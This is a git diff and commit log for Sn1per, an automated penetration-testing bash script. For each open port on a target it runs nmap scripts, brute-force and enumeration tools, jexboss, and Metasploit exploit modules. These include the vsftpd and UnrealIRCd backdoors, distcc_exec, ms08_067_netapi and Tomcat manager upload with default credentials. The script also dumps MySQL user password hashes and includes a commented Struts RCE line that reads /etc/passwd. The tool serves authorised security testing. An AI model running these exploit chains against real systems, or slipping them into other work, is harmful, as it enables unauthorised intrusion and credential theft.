 port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
 port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap-$TARGET.xml | grep open`
@@ -516,7 +563,7 @@ then
 	echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"	
-	nmap -sV -sC -T5 -p 21 --script=ftp-* $TARGET
+	nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
 	msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
 fi

@@ -525,8 +572,11 @@ then
 	echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
-	nmap -sV -sC -T5 -p 22 --script=ssh-* $TARGET
-	msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$PWD"/BruteX/wordlists/simple-users.txt; setg RHOSTS "$TARGET"; setg "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
+	cd ssh-audit
+	python ssh-audit.py $TARGET:22
+	cd ..
+	nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
+	msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$PWD"/BruteX/wordlists/simple-users.txt; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
 fi

 if [ -z "$port_23" ];
@@ -536,7 +586,7 @@ else
 	echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
 	echo ""
 	cisco-torch -A $TARGET
-	nmap -sV -T5 --script=telnet* -p 23 $TARGET
+	nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
 	msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
 fi

@@ -545,7 +595,7 @@ then
 	echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
-	nmap -sV -T5 --script=smtp* -p 25 $TARGET
+	nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
 	smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
 	msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" 
 fi
@@ -555,7 +605,7 @@ then
 	echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
-	nmap -sV -T5 --script=dns* -p U:53,T:53 $TARGET	
+	nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET	
 fi

 if [ -z "$port_79" ];
@@ -563,7 +613,7 @@ then
 	echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
-	nmap -sV -T5 --script=finger* -p 79 $TARGET
+	nmap -A -sV -T5 --script=finger* -p 79 $TARGET
 	bin/fingertool.sh $TARGET BruteX/wordlists/simple-users.txt
 fi

@@ -637,7 +687,7 @@ else
 	then
 		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
 		echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
-		nmap -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
+		nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
 		echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
 		dirb http://$TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -676,7 +726,7 @@ then
 	echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
-	nmap -sV -T5 --script=pop* -p 110 $TARGET
+	nmap -A -sV -T5 --script=pop* -p 110 $TARGET
 fi

 if [ -z "$port_111" ];
@@ -695,7 +745,7 @@ then
 else
 	echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET"
 	rpcinfo -p $TARGET
-	nmap -p 135 -T5 --script=rpc* $TARGET
+	nmap -A -p 135 -T5 --script=rpc* $TARGET
 fi

 if [ -z "$port_139" ];
@@ -708,17 +758,26 @@ else
 	enum4linux $TARGET
 	python $SAMRDUMP $TARGET
 	nbtscan $TARGET
-	nmap -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
+	nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
 	msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
 fi

+if [ -z "$port_161" ];
+then
+	echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 161 opened... running tests...$RESET"
+	for a in `cat BruteX/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
+	nmap -sU -p 161 --script=snmp* $TARGET
+fi
+
 if [ -z "$port_162" ];
 then
 	echo -e "$OKRED + -- --=[Port 162 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET"
-	for a in `cat BruteX/wordlists/snmp-community-strings.txt`; do snmpwalk $TARGET -c $a; done;
-	nmap -p 162 --script=snmp* $TARGET
+	for a in `cat BruteX/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
+	nmap -A -p 162 --script=snmp* $TARGET
 fi

 if [ -z "$port_389" ];
@@ -726,7 +785,7 @@ then
 	echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET"
-	nmap -p 389 -T5 --script=ldap* $TARGET
+	nmap -A -p 389 -T5 --script=ldap* $TARGET
 fi

 if [ -z "$port_443" ];
@@ -805,7 +864,7 @@ else
 	if [ "$MODE" = "web" ];
 	then
 		echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
-		nmap -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
+		nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
 		echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
 		dirb https://$TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -851,7 +910,7 @@ else
 	enum4linux $TARGET
 	python $SAMRDUMP $TARGET
 	nbtscan $TARGET
-	nmap -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
+	nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
 	msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
 fi

@@ -860,7 +919,7 @@ then
 	echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET"
-	nmap -sV -T5 -p 512 --script=rexec* $TARGET
+	nmap -A -sV -T5 -p 512 --script=rexec* $TARGET
 fi

 if [ -z "$port_513" ]
@@ -868,7 +927,7 @@ then
 	echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET"
-	nmap -sV -T5 -p 513 --script=rlogin* $TARGET
+	nmap -A -sV -T5 -p 513 --script=rlogin* $TARGET
 fi

 if [ -z "$port_514" ];
@@ -879,12 +938,20 @@ else
 	amap $TARGET 514 -A
 fi

+if [ -z "$port_1433" ];
+then
+	echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
+else
+	echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
+	nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET
+fi
+
 if [ -z "$port_2049" ];
 then
 	echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
-	nmap -sV -T5 --script=nfs* -p 2049 $TARGET
+	nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
 	rpcinfo -p $TARGET
 	showmount -e $TARGET
 	smbclient -L $TARGET -U " "%" "
@@ -895,7 +962,7 @@ then
 	echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
-	nmap -sV -T5 --script=ftp* -p 2121 $TARGET
+	nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
 	msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
 fi

@@ -904,7 +971,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
-	nmap -sV --script=mysql* -p 3306 $TARGET
+	nmap -A -sV --script=mysql* -p 3306 $TARGET
 	mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
 fi

@@ -913,7 +980,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
-	nmap -p 3310 -T5 -sV --script clamav-exec $TARGET
+	nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
 fi

 if [ -z "$port_3128" ];
@@ -921,7 +988,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
-	nmap -p 3128 -T5 -sV --script=*proxy* $TARGET
+	nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
 fi

 if [ -z "$port_3389" ];
@@ -929,7 +996,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
-	nmap -sV -T5 --script=rdp-* -p 3389 $TARGET
+	nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
 	rdesktop $TARGET &
 fi

@@ -938,7 +1005,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
-	nmap -sV -T5 --script=distcc-* -p 3632 $TARGET
+	nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
 	msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
 fi

@@ -947,7 +1014,7 @@ then
 	echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
-	nmap -sV --script=pgsql-brute -p 5432 $TARGET
+	nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
 fi

 if [ -z "$port_5800" ];
@@ -955,7 +1022,7 @@ then
 	echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
-	nmap -sV -T5 --script=vnc* -p 5800 $TARGET
+	nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
 fi

 if [ -z "$port_5900" ];
@@ -963,7 +1030,7 @@ then
 	echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
-	nmap -sV -T5 --script=vnc* -p 5900 $TARGET
+	nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
 fi

 if [ -z "$port_6000" ];
@@ -971,7 +1038,7 @@ then
 	echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
-	nmap -sV -T5 --script=x11* -p 6000 $TARGET
+	nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
 fi

 if [ -z "$port_6667" ];
@@ -979,7 +1046,7 @@ then
 	echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
-	nmap -sV -T5 --script=irc* -p 6667 $TARGET
+	nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
 	msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
 fi

@@ -996,6 +1063,8 @@ else
 	cd ..
 	nikto -h http://$TARGET:8000 
 	cutycapt --url=http://$TARGET:8000 --out=loot/$TARGET-port8000.jpg
+	python jexboss/jexboss.py -host http://$TARGET:8000
+
 fi

 if [ -z "$port_8100" ];
@@ -1014,6 +1083,7 @@ else
 	cd ..
 	nikto -h http://$TARGET:8100 
 	cutycapt --url=http://$TARGET:8100 --out=loot/$TARGET-port8100.jpg
+	python jexboss/jexboss.py -host http://$TARGET:8100
 fi

 if [ -z "$port_8080" ];
@@ -1032,12 +1102,13 @@ else
 	cd ..
 	nikto -h http://$TARGET:8080 
 	cutycapt --url=http://$TARGET:8080 --out=loot/$TARGET-port8080.jpg
-	nmap -p 8080 -T5 --script=*proxy* $TARGET
+	nmap -A -p 8080 -T5 --script=*proxy* $TARGET
 	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
 	# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
 	# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
-	python jexboss/jexboss.py http://$TARGET:8080
-	python jexboss/jexboss.py https://$TARGET:8080
+	python jexboss/jexboss.py -host http://$TARGET:8080
+	python jexboss/jexboss.py -host https://$TARGET:8080
+	
 fi

 if [ -z "$port_8180" ];
@@ -1061,6 +1132,7 @@ else
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
 	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
+	python jexboss/jexboss.py -host http://$TARGET:8180
 fi

 if [ -z "$port_8443" ];
@@ -1080,7 +1152,8 @@ else
 	cd ..
 	nikto -h https://$TARGET:8443 
 	cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg
-	nmap -p 8443 -T5 --script=*proxy* $TARGET
+	nmap -A -p 8443 -T5 --script=*proxy* $TARGET
+	python jexboss/jexboss.py -host https://$TARGET:8443	
 fi

 if [ -z "$port_8888" ];
@@ -1095,6 +1168,7 @@ else
 	xsstracer $TARGET 8888
 	nikto -h http://$TARGET:8888 
 	cutycapt --url=https://$TARGET:8888 --out=loot/$TARGET-port8888.jpg
+	python jexboss/jexboss.py -host http://$TARGET:8888	
 fi

 if [ -z "$port_10000" ];
@@ -1132,6 +1206,20 @@ else
 	echo ""
 	rm -f scan.log
 fi
-./sniper loot
+cd $PWD/loot/
+echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)"
+mkdir reports/ -p 2> /dev/null
+echo -e "$OKORANGE + -- --=[Generating reports..."
+for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done
+mv $PWD/report-* $PWD/reports/ 2> /dev/null
+mkdir $PWD/screenshots/ -p 2> /dev/null
+mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null
+mkdir $PWD/nmap -p 2> /dev/null
+mv $PWD/*.xml $PWD/nmap/ 2> /dev/null
+mkdir $PWD/domains -p 2> /dev/null
+mv $PWD/domains-* $PWD/domains/ 2> /dev/null
+mkdir $PWD/output -p 2> /dev/null
+mv $PWD/sniper-* $PWD/output 2> /dev/null
+rm -f $PWD/.fuse_* 2> /dev/null
 echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
 exit 0
Author	SHA1	Message	Date
root	d57859c833	Sn1per by 1N3@CrowdShield	2016-08-24 11:42:56 -04:00
root	5dc1231d1f	Sn1per by 1N3@CrowdShield	2016-08-24 11:40:59 -04:00
root	2aa19dc194	Merge branch 'master' of https://github.com/1N3/Sniper	2016-08-24 11:36:02 -04:00
root	c28930822f	Sn1per by 1N3@CrowdShield	2016-08-24 10:50:42 -04:00
1N3	7ae4c283fc	Delete README.md~	2016-08-21 15:43:10 -07:00
root	a8b96424ce	Sn1per by 1N3@CrowdShield	2016-08-21 18:40:24 -04:00
root	948a2632d5	Sn1per by 1N3@CrowdShield	2016-08-21 18:32:54 -04:00
root	71a1c79989	Sn1per by 1N3@CrowdShield	2016-08-21 18:29:51 -04:00
1N3	709c33856e	Merge pull request #44 from hexageek/patch-1 Added SNMP port 162/tcp checks	2016-08-21 15:14:03 -07:00
hexageek	c7d887115b	Update sniper	2016-08-22 00:10:56 +02:00
root	cf6540d8ff	Merge branch 'master' of https://github.com/1N3/Sniper	2016-08-12 13:24:52 -04:00
root	a20343a3ee	Sn1per by 1N3@CrowdShield	2016-08-12 13:24:07 -04:00
1N3	039e2613ab	Delete README.md~	2016-07-29 21:31:40 -07:00
1N3	0fea397479	Delete sniper~	2016-07-29 21:31:29 -07:00
root	27dffa419c	Sn1per by 1N3@CrowdShield	2016-07-29 21:29:42 -07:00
root	a0ebeff173	Merge branch 'master' of https://github.com/1N3/Sniper	2016-07-29 21:23:39 -07:00
root	646ac56778	Sn1per by 1N3@CrowdShield	2016-07-29 21:21:43 -07:00
1N3	59b7a6bc7b	Merge pull request #39 from joaomatosf/patch-2 Update install.sh	2016-07-28 21:03:13 -07:00
1N3	038b0a1a56	Merge pull request #38 from joaomatosf/patch-1 Adjustments to work properly with jexboss	2016-07-28 20:59:44 -07:00
João F M Figueiredo	3415c7fd81	Update sniper	2016-07-28 23:12:31 -03:00
João F M Figueiredo	1b8e037423	Update install.sh	2016-07-28 23:06:42 -03:00
João F M Figueiredo	141ad2d5d8	Update sniper	2016-07-28 23:04:09 -03:00